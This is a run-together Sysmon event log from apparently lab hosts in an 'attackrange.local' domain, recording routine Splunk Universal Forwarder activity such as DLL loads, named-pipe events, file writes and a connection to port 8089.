Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606432Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:32.933{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606431Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:32.933{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x80000000000000001606430Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.717{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606429Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.717{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22677CF96FD3C0E99F4D4BFCD37E6721,SHA256=66694DA061DDD5EB8935C6CCA30955821D5601ACA9628D485C21F07B693A8CFCfalsefalse - insufficient disk space 11241100x80000000000000001606428Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.699{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606427Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.699{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F88AB6EB0659E72505120E93E20F091F,SHA256=DE505A3121DAB22EB76DF5FFD938BBE1B81B1818E660CC04F46AAA6FE62D4EE0falsefalse - insufficient disk space 354300x80000000000000001095249Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:27.716{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1157-false10.0.1.12-8089- 23542300x80000000000000001095248Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:32.593{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0532005CD4FF43A4C2B738D8004B72B,SHA256=64672BC31A462945A2095116DA1B5AB8163348C998BDE2B3D00E418824AF6EEE,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606426Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.664{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606425Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.664{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E31B066771D696E713EA23B58FE285B4,SHA256=92A26A1EABA9E3906CE4A8397FCA6C7CE00CADDCD92776028E3D27036D877F44falsefalse - insufficient disk space 
534500x80000000000000001606424Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.401{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x80000000000000001606423Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.401{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001606422Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.401{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001606421Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.401{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x80000000000000001606420Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.279{21761711-7A88-6080-C660-00000000BB01}2744C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001606419Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001606418Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001606417Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x80000000000000001606416Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service 
Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001606415Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x80000000000000001606414Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001606413Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001606412Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001606411Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001606410Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001606409Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001606408Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001606407Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001606406Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001606405Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\winspool.drv10.0.14393.4169 (rs1_release.210107-1130)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=D21FAA584F844E61375D95B5BE9115EE,SHA256=E221EA0081FDE7AAAD71A38016A8D470082B3732E9ED2D8ED7C97E9F41AF0045trueMicrosoft WindowsValid 
734700x80000000000000001606404Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001606403Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001606402Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001606401Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, 
http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001606400Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001606399Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001606398Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001606397Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, 
http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001606396Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001606395Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001606394Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001606393Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating 
SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001606392Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001606391Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001606390Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001606389Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for 
SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001606388Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001606387Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 734700x80000000000000001606386Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001606385Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001606384Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001606383Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x80000000000000001606382Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
734700x80000000000000001606381Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001606380Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 